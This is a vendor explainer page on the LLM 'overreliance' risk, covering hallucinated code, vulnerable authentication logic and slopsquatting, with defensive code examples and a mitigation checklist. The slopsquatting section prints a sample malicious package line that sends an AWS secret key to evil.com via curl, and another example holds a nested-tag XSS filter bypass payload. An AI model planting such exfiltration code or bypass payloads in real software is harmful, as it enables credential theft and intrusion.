LLM09: Overreliance

Verified by Precogs Threat Research
LLM09:2025 · Severity: MEDIUM · CWE-20 · CWE-345 · CWE-1104

Overreliance occurs when developers and users blindly trust LLM-generated output without validation — accepting AI-generated code, security assessments, or factual claims without review. LLMs hallucinate with confidence, generate plausible-looking but vulnerable code, and cite non-existent sources. When AI-generated content is deployed without verification, it introduces bugs, security vulnerabilities, and misinformation into production systems.

The Hallucination Problem

LLMs generate plausible text, not verified truth. Published estimates put GPT-4 hallucination rates between 3% and 10%, depending on the domain. In code generation, this manifests as functions that look correct but contain subtle logic errors, security vulnerabilities, or calls to non-existent APIs. Developers who have seen the AI produce correct code 90% of the time may stop reviewing it carefully — and that is exactly when the dangerous 10% slips through.
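A toy illustration of this failure mode (hypothetical code, not taken from any real model output): a leap-year check that agrees with the correct rule on almost every year a reviewer is likely to try, and fails only on century years.

```python
# ❌ Plausible AI-generated code — looks right, passes casual testing
def is_leap_year_ai(year: int) -> bool:
    return year % 4 == 0 and year % 100 != 0  # omits the 400-year rule

# ✅ Full Gregorian rule
def is_leap_year(year: int) -> bool:
    return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
```

Both functions agree on 2023 and 2024. Only an edge case such as the year 2000, a leap year that the buggy version rejects, exposes the difference, which is exactly the kind of input a rushed review skips.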

AI-Generated Vulnerabilities

Research from Stanford (2023) showed that developers using AI code assistants produced significantly more security vulnerabilities than those coding without AI help — and were more confident their code was secure. The AI confidently generates code with SQL injection, XSS, path traversal, and missing authentication, and developers trust it because it came from "the AI."

Package Hallucination

LLMs frequently suggest importing packages that don't exist. Attackers exploit this by creating malicious packages with hallucinated names (a technique called "slopsquatting"). When a developer follows the AI's suggestion and runs npm install hallucinated-package, they install malware. This has been observed with npm, PyPI, and Maven packages.

⚔️ Attack Examples & Code Patterns

Vulnerable AI-generated authentication code

Code that looks correct but has a critical timing attack vulnerability:

// AI-generated code that a developer might accept without review
// ❌ VULNERABLE — timing attack on password comparison
function verifyPassword(input: string, stored: string): boolean {
  if (input.length !== stored.length) return false;
  for (let i = 0; i < input.length; i++) {
    if (input[i] !== stored[i]) return false;  // Early return leaks info
  }
  return true;
}

// ✅ SAFE — constant-time comparison
// (Real systems compare fixed-length password *hashes*, not raw strings,
// so the length check below does not leak secret information.)
import { timingSafeEqual } from 'crypto';
function verifyPasswordSafe(input: string, stored: string): boolean {
  const a = Buffer.from(input);
  const b = Buffer.from(stored);
  if (a.length !== b.length) return false;
  return timingSafeEqual(a, b);  // No timing side channel
}

Slopsquatting — hallucinated package attack

AI suggests a non-existent package that an attacker has registered:

# AI suggests: "Install the flask-auth-helper package"
# pip install flask-auth-helper

# This package doesn't exist — the AI hallucinated it.
# An attacker registers "flask-auth-helper" on PyPI with:
import os
os.system("curl http://evil.com/steal?key=" + 
    os.environ.get("AWS_SECRET_ACCESS_KEY", ""))

# The developer installs malware thinking it's a real package.
# ✅ MITIGATION: Always verify packages exist on official repos
# before installing. Check download counts and maintainer history.
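The verification step in the comment above can be automated. A minimal sketch, assuming only Python's standard library and PyPI's public JSON metadata endpoint (`https://pypi.org/pypi/<name>/json`, which returns HTTP 404 for unregistered names):

```python
import urllib.error
import urllib.request

PYPI_JSON = "https://pypi.org/pypi/{name}/json"  # PyPI's public metadata API

def package_exists(name: str, opener=urllib.request.urlopen) -> bool:
    """Return True if `name` is registered on PyPI; False on a 404,
    a strong signal the package was hallucinated. `opener` is
    injectable so the check can be tested without network access."""
    try:
        with opener(PYPI_JSON.format(name=name)) as resp:
            return resp.status == 200
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return False
        raise  # other HTTP errors: fail loudly rather than guess
```

Note that existence alone is not sufficient: an attacker may already have squatted the hallucinated name, so download counts and maintainer history still need a look before installing.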

🔍 Detection Checklist

  • Require code review for all AI-generated code before merge
  • Run security-focused CI/CD scans on every commit (Precogs AI)
  • Cross-reference AI-suggested packages against official registries
  • Test AI-generated functions with adversarial inputs
  • Track which code was AI-generated vs human-written for audit
  • Educate developers about common AI code generation pitfalls
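The "adversarial inputs" item in the checklist deserves a concrete shape. The sanitizer below is a hypothetical example of plausible AI output (not from any real model): it handles the obvious payload but falls to a classic nested-tag filter bypass that only adversarial testing would catch.

```python
# ❌ Plausible AI-generated sanitizer — single-pass tag removal
def strip_script_ai(html: str) -> str:
    return html.replace("<script>", "").replace("</script>", "")

# Happy-path input looks fine in review...
assert strip_script_ai("<script>alert(1)</script>") == "alert(1)"

# ...but a nested payload reassembles itself after one removal pass:
payload = "<scr<script>ipt>alert(1)</scr</script>ipt>"
assert "<script>" in strip_script_ai(payload)  # filter bypassed
```

A property worth asserting in tests is that the forbidden token never appears in the output for any input, rather than spot-checking a few friendly strings.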

🛡️ Mitigation Strategy

Implement mandatory code review for AI-generated code. Use automated testing (unit, integration, security) to validate LLM output. Cross-reference AI-generated facts with authoritative sources. Set up CI/CD gates that block deployment of unreviewed AI code. Educate teams about LLM hallucination rates.
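The CI/CD gate can be sketched in a few lines. This assumes a team convention of commit-message trailers ("AI-Generated: true" and "Reviewed-by:"); the trailer names are illustrative, not any standard:

```python
AI_MARKER = "AI-Generated: true"   # illustrative trailer, set by tooling
REVIEW_TRAILER = "Reviewed-by:"    # illustrative human sign-off trailer

def commit_blocked(message: str) -> bool:
    """Block commits marked as AI-generated that lack a human sign-off."""
    return AI_MARKER in message and REVIEW_TRAILER not in message
```

In CI, the gate would read each commit message in the push and fail the pipeline whenever `commit_blocked` returns True, forcing the review to happen before merge rather than after deployment.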

🛡️ How Precogs AI Protects You

Precogs AI acts as the "second pair of eyes" for AI-generated code. Every AI-generated commit is automatically scanned for vulnerabilities, and AutoFix PRs correct issues before they reach production — eliminating the gap between AI code generation and human review.


Why is overreliance on AI-generated code dangerous?

LLMs hallucinate with confidence — generating plausible but vulnerable code, suggesting non-existent packages, and producing incorrect security logic. Stanford research showed developers using AI assistants produced more vulnerabilities while feeling more confident. Prevention requires automated security scanning, mandatory code review, and package verification.

Protect Against LLM09: Overreliance

Precogs AI automatically detects LLM09: Overreliance vulnerabilities and generates AutoFix PRs.